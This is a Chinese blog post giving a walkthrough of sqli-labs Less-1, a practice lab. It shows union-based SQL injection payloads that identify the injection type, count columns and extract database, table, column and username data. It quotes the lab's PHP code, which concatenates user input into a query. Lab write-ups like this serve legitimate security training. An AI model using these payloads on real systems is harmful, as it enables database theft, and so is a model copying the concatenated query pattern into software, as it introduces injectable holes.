[网络安全]sqli-labs Less-1 解题详析

已于 2023-07-23 09:37:31 修改
阅读量1.9k 收藏
点赞数 1
分类专栏: 网络安全 # Sqli-Labs靶场攻防实战 文章标签: 安全 web安全 sql 数据库
于 2023-04-27 18:21:11 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/130410800
版权

[网络安全]Less-1 GET - Error based - Single quotes - String:基于错误的GET单引号字符型注入

判断注入类型

在这里插入图片描述GET1 and 1=2仍有正常回显,说明该漏洞类型不是数字型注入。
在这里插入图片描述
GET1' and '1'='2没有回显,说明该漏洞类型为字符型注入。

判断注入点个数

GETid=1' order by 4 --+ 回显Unknown
在这里插入图片描述GETid=1' order by 3 --+ 回显如下:
在这里插入图片描述说明注入点个数为3个
即可构造语句如下

-1' union select 1,2,xx form xx; --+

查库名

-1' union select 1,2,database(); --+

在这里插入图片描述

查表名

Payload1:

-1' union select 1,2,table_name from information_schema.tables where table_schema='库名'; --+

实例如下:

-1' union select 1,2,table_name from information_schema.tables where table_schema='security'; --+

仅回显一个表名
在这里插入图片描述

Payload2:

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显所有表名
在这里插入图片描述

区别成因

查看部分源代码:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}

由以上可知,后端通过mysql_fetch_array()获取当前行数据,而注入语句返回的结果又是以行排序的,所以仅返回了位于首行的email表名

Group_concat

group_concat函数能将查询结果集合起来,在Payload2中,由于该函数集合了所有的表名到一行中,导致所有表名被回显。

查users表的列名

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='表名'; --+

实例如下:

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

-1' union select 1,2,group_concat(列名) from 库名.表名; --+

实例如下:

-1' union select 1,2,group_concat(username) from security.users; --+

在这里插入图片描述

总结

以上为[网络安全]sqli-labs Less-1 解题详析,后续将分享[网络安全]sqli-labs Less-2 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。

秋说
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs第一关
weixin_69147946的博客
11-11 437
sqli-labs靶机笔记
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 534
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli注入详解——>sqli-labs less-1~65
最新发布
qq_51780583的博客
03-18 627
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs靶场 Less-1(详细版)
m0_57671135的博客
05-29 155
还是只显示正常数据(显示位有限,优先显示前边显示为结果,后边自己添加的查询结果没有任何显示),接下来让前边查询不出来。id=-1' union select 1,2,3--+ (或给一个条件为假?
在线sqli-labs 通关大全 Less-1
qq_44985415的博客
08-27 1401
sqli-labs (1) sqli-labs实验前: 本人因在sqli-labs搭建过程中遇到大量问题,百度后依旧无果,所以现决定在在线sqli-labs平台进行试验。 sqli-labs在线平台: http://43.247.91.228:84/ 在线平台sqli-labs Page-1 点击Less-1可直接进行试验 一.知识点 1.FireFox插件HackBar使用 2.字符型注入:注意单引号闭合 3.sqlmap这里暂时不使用,想了解的可以自己尝试,刚开始手工注入扎扎实实打基础较好。
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 559
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符型注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2582
sqli-labs靶场之前建议补一下基础。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
安装sqli-labs
10-22
安装sqli-labs靶场环境 ...安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过安装和使用sqli-labs靶场环境,可以了解和掌握SQL注入漏洞的知识,提高Web应用安全能力。
SQLi-LABS的Less1分析
haoahaoahaoahao的博客
01-11 1122
id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查询当前数据库(security)下所有的表名。id=-1' union select 1,database(),3 --+ //把2 改为了database()// select <字段> from <数据库>.<表> where id='
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 869
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli less-01
ANYOUZHEN的博客
04-29 1306
我们试着输入id=1,查看是否有回显 接着输入id=1',发现出现报错 构造payload查询列表,?id=1' order by 3--+ 当我们输入?id=1' order by 4--+时出现了unknown,说明列表为3 接下来我们使用联合查询,?id=-1' union select 1,2,3--+; 然后发现2,3列有回应,说明可以爆破出数据库,列,用户和密码 接下来我们查询数据库,http://127.0.0.1/sqli/Less-1/?id=-1' union
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1874
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库
sqli lab page1-lesson1[GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)]
m0_68980215的博客
06-28 164
sqlilab,page1-lesson1
Sqli-Labs之less-1
ISNS的博客
02-03 1768
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值